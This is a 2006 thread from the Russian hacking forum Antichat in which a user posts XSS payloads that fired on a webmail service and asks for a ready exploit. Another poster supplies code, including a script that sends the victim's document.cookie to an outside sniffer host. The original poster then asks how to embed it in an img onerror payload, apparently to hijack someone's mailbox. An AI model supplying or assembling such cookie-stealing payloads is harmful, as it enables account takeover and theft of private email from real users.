Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Xss's (https://forum.antichat.xyz/showthread.php?t=23651)

anti_sec2 07.09.2006 18:49
Xss's
 
привет вот ротестил одно мыло хсс тестером
проверил мыло
эти дали алерт


<image src="" onerror=alert(8)>
<image src='' onerror=alert(9)>
<img src="" onerror=alert(10)>
<span sss="alert(21);this.sss=null" style=top:expression(eval(this.sss));></span>
<span sss='alert(22);this.sss=null' style=top:expression(eval(this.sss));></span>
<span sss=alert(23);this.sss=null style=top:expression(eval(this.sss));></span>
<style type="text/css">@import url(vbscript:alert(38));</style>


тепер используя это что мне отправит чтобы внедрить antichat.ru/cgi-bin/s.jpg
плз ес можете дайте готовый сплоит или чо то в этом роде

Murt@zaa 07.09.2006 22:28
Ни кто не отвечает? слишком уж изЪеженная эта тема про Xss и на форуме можно найти все что надо .
Главное пользоватся поиском=) А на каком почтовике находится мыло???

anti_sec2 08.09.2006 20:52
очен прощу хелп
искал не нащел

+toxa+ 08.09.2006 21:10
эм....

Код:
# Простой вызов по ссылке:
<a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
# Вызов как картинки:
<img src="http://antichat.ru/cgi-bin/s.jpg">
# Вызов из скрипта:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
http://antichat.ru/sniff/

anti_sec2 12.09.2006 21:36
ок тепер где надо вставит это :
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
в этом
<img src="" onerror=alert(10)>

thank


Время: 17:01